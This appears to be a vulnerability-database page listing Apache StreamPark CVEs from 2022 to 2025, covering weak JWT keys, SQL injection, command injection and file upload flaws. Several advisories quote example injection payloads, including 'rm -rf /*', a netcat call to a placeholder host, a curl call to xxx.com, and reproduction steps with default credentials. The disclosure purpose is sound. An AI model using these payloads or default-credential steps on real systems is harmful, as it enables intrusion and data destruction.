Apache Streampark

Apache StreamPark: Weak Fixed Encryption Keys (v2.0.02.1.6)
CVE-2025-53960 5.9 - Medium - December 12, 2025

When issuing JSON Web Tokens (JWT), Apache StreamPark directly uses the user's password as the HMAC signing key (e.g., with the HS256 algorithm). An attacker can exploit this vulnerability to perform offline brute-force attacks on the user's password using a captured JWT, or to arbitrarily forge identity tokens for the user if the password is already known, ultimately leading to complete account takeover. This issue affects Apache StreamPark: from 2.0.0 before 2.1.7. Users are recommended to upgrade to version 2.1.7, which fixes the issue.

Use of a Risky Cryptographic Primitive

Apache StreamPark Hard-Coded Encryption Key (2.0.0-2.1.6)
CVE-2025-54947 5.3 - Medium - December 12, 2025

In Apache StreamPark versions 2.0.0 through 2.1.7, a security vulnerability involving a hard-coded encryption key exists. This vulnerability occurs because the system uses a fixed, immutable key for encryption instead of dynamically generating or securely configuring the key. Attackers may obtain this key through reverse engineering or code analysis, potentially decrypting sensitive data or forging encrypted information, leading to information disclosure or unauthorized system access. This issue affects Apache StreamPark: from 2.0.0 before 2.1.7. Users are recommended to upgrade to version 2.1.7, which fixes the issue.

Use of Hard-coded Cryptographic Key

Apache StreamPark <2.1.7: Weak AES-ECB Encryption Exposes JWT
CVE-2025-54981 7.5 - High - December 12, 2025

Weak Encryption Algorithm in StreamPark, The use of an AES cipher in ECB mode and a weak random number generator for encrypting sensitive data, including JWT tokens, may have risked exposing sensitive authentication data This issue affects Apache StreamPark: from 2.0.0 before 2.1.7. Users are recommended to upgrade to version 2.1.7, which fixes the issue.

Use of a Broken or Risky Cryptographic Algorithm

Apache StreamPark 2.1.42.1.5 ExecAssigned Permission Escalation
CVE-2025-30001 7.3 - High - October 10, 2025

Incorrect Execution-Assigned Permissions vulnerability in Apache StreamPark. This issue affects Apache StreamPark: from 2.1.4 before 2.1.6. Users are recommended to upgrade to version 2.1.6, which fixes the issue.

Incorrect Execution-Assigned Permissions

SQL Injection in Apache StreamPark 2.1.42.1.5 (Fixed in 2.1.6)
CVE-2024-48988 7.6 - High - August 22, 2025

SQL Injection vulnerability in Apache StreamPark. This issue affects Apache StreamPark: from 2.1.4 before 2.1.6. Users are recommended to upgrade to version 2.1.6, which fixes the issue. This vulnerability is present only in the distribution package (SpringBoot platform) and does not involve Maven artifacts. It can only be exploited after a user has successfully logged into the platform (implying that the attacker would first need to compromise the login authentication). As a result, the associated risk is considered relatively low.

SQL Injection: Hibernate

Session not invalidated after logout (backend service) pre2.1.4
CVE-2024-29070 - July 23, 2024

On versions before 2.1.4, session is not invalidated after logout. When the user logged in successfully, the Backend service returns "Authorization" as the front-end authentication credential. "Authorization" can still initiate requests and access data even after logout. Mitigation: all users should upgrade to 2.1.4

Insufficient Session Expiration

Apache Flink <2.1.4: Auth Token Abuse Exposes All Users' Info (CVE-2024-34457)
CVE-2024-34457 6.5 - Medium - July 22, 2024

On versions before 2.1.4, after a regular user successfully logs in, they can manually make a request using the authorization token to view everyone's user flink information, including executeSQL and config. Mitigation: all users should upgrade to 2.1.4

Insecure Direct Object Reference / IDOR

Template Injection RCE (v<2.1.4) in Unknown Product
CVE-2024-29178 8.8 - High - July 18, 2024

On versions before 2.1.4, a user could log in and perform a template injection attack resulting in Remote Code Execution on the server, The attacker must successfully log into the system to launch an attack, so this is a moderate-impact vulnerability. Mitigation: all users should upgrade to 2.1.4

Code Injection

Streampark <2.1.4 Auth Disclosure via Authorization Header
CVE-2024-29120 - July 17, 2024

In Streampark (version < 2.1.4), when a user logged in successfully, the Backend service would return "Authorization" as the front-end authentication credential. User can use this credential to request other users' information, including the administrator's username, password, salt value, etc.  Mitigation: all users should upgrade to 2.1.4

StreamPark < Operator Command Injection (CVE-2023-52291) Pre-2.1.4
CVE-2023-52291 4.7 - Medium - July 17, 2024

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Background: In the "Project" module, the maven build args  < operator causes command injection. e.g : < (curl  http://xxx.com ) will be executed as a command injection, Mitigation: all users should upgrade to 2.1.4,  The "<" operator will blocked?

Command Injection

Streampark RCE via Maven Build Argument (pre-2.1.4)
CVE-2024-29737 4.7 - Medium - July 17, 2024

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.4 Background info: Log in to Streampark using the default username (e.g. test1, test2, test3) and the default password (streampark). Navigate to the Project module, then add a new project. Enter the git repository address of the project and input `touch /tmp/success_2.1.2` as the "Build Argument". Note that there is no verification and interception of the special character "`". As a result, you will find that this injection command will be successfully executed after executing the build. In the latest version, the special symbol ` is intercepted.

Command Injection

SQLi via unsanitized sort field in streampark-console <2.1.4
CVE-2023-52290 - July 16, 2024

In streampark-console the list pages(e.g: application pages), users can sort page by field. This sort field is sent from the front-end to the back-end, and the SQL query is generated using this field. However, because this sort field isn't validated, there is a risk of SQL injection vulnerability. The attacker must successfully log into the system to launch an attack, which may cause data leakage. Since no data will be written, so this is a low-impact vulnerability. Mitigation: all users should upgrade to 2.1.4, Such parameters will be blocked.

SQL Injection

Streampark <2.1.2 Remote Command Execution via Unchecked Maven Parameters
CVE-2023-49898 7.2 - High - December 15, 2023

In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.2 Example: ##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&": /usr/share/java/maven-3/conf/settings.xml || rm -rf /* /usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &

Command Injection

Streampark: SQL Injection via NameBased Fuzzy Search before v2.1.2
CVE-2023-30867 4.9 - Medium - December 15, 2023

In the Streampark platform, when users log in to the system and use certain features, some pages provide a name-based fuzzy search, such as job names, role names, etc. The sql syntax :select * from table where jobName like '%jobName%'. However, the jobName field may receive illegal parameters, leading to SQL injection. This could potentially result in information leakage. Mitigation: Users are recommended to upgrade to version 2.1.2, which fixes the issue.

SQL Injection

Apache StreamPark 1.0.01.x 'username not verified' vuln (CVE-2022-46365)
CVE-2022-46365 9.1 - Critical - May 01, 2023

Apache StreamPark 1.0.0 before 2.0.0 When the user successfully logs in, to modify his profile, the username will be passed to the server-layer as a parameter, but not verified whether the user name is the currently logged user and whether the user is legal, This will allow malicious attackers to send any username to modify and reset the account, Users of the affected versions should upgrade to Apache StreamPark 2.0.0 or later.

Apache StreamPark LDAP Injection flaw fixed in 2.0.0
CVE-2022-45801 5.4 - Medium - May 01, 2023

Apache StreamPark 1.0.0 to 2.0.0 have a LDAP injection vulnerability. LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements through techniques similar to SQL Injection. LDAP injection attacks could result in the granting of permissions to unauthorized queries, and content modification inside the LDAP tree. This risk may only occur when the user logs in with ldap, and the user name and password login will not be affected, Users of the affected versions should upgrade to Apache StreamPark 2.0.0 or later.

Injection

StreamPark insecure Jar upload (CVE-2022-45802)
CVE-2022-45802 9.8 - Critical - May 01, 2023

Streampark allows any users to upload a jar as application, but there is no mandatory verification of the uploaded file type, causing users to upload some high-risk files, and may upload them to any directory, Users of the affected versions should upgrade to Apache StreamPark 2.0.0 or later

Unrestricted File Upload